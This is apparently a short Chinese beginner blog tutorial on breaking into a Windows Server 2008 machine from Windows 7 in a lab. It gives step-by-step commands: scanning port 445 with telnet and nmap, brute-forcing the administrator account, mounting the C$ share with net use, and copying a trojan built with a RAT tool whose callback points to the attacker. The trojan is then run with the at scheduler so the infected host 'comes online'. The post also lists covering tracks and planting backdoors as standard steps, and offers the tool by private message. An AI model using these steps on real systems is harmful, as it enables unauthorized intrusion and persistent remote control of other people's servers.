Windows7 渗透Windows208 服务器(小白入门)
简单的介绍:
通过扫描Windows2008的445端口,进行暴力破解,获取账号密码
之后,注入木马,留后门。
一:开启Windows7虚拟机和Windows2008(扫描)
1.可以安装Telnet服务,进行扫描。
2. 要保证Windows2008和Windows7在同一个网段
3. 手工测试端口号开放:telnet IP地址 测试端口
4. 
5. 也可以用kali的nmap进行扫描:nmap 192.168.0.115;
6. 第一步扫描完成
二:进行暴力破解
1.暴力破解的工具非常多,这里就不演示暴力破解了
2.注意一般服务器的用户是administrator
三:进行连接
1.
2.输入暴力破解出来的账号密码
3.验证连接成功:输入 net use
4.也可以进行其他的操作,创建文件,copy等等
四:制作木马
1.利用大白鲨软件
注意:第一个ip地址是Windows7的ip地址
2.生成木马之后会选择一个保存路径
就像这样!!!
五:注入后门
1.命令:copy 地址 \ip\c$(或者其他)
2.在Windows2008的C盘里面可以发现有一个myserver.exe的文件
3.然后就是让Windows2008 运行这个木马
4.命令:net time \192.168.0.115
5.然后通过dos命令,部署一个任务
6.命令:at \192.168.0.115 14:36 “c:\myserver.exe”
六:等待肉鸡上线
完成一次操作!!!
总结:渗透基本步骤
0.授权
1.信息收集
nslookup whois
2.扫描漏洞
namp=ip范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0
扫描网站漏洞()
3.漏洞利用
4.提权(shell环境、桌面环境、最高权限)
5.毁尸灭迹
6.留后门
7.渗透测试报告
手工测试端口号开放:
telnet IP地址 测试端口
上面的软件可以私信我!!!
上面一些操作如果错了的,希望各位大佬指出
上面的操作比较简单,希望大佬不喜勿喷~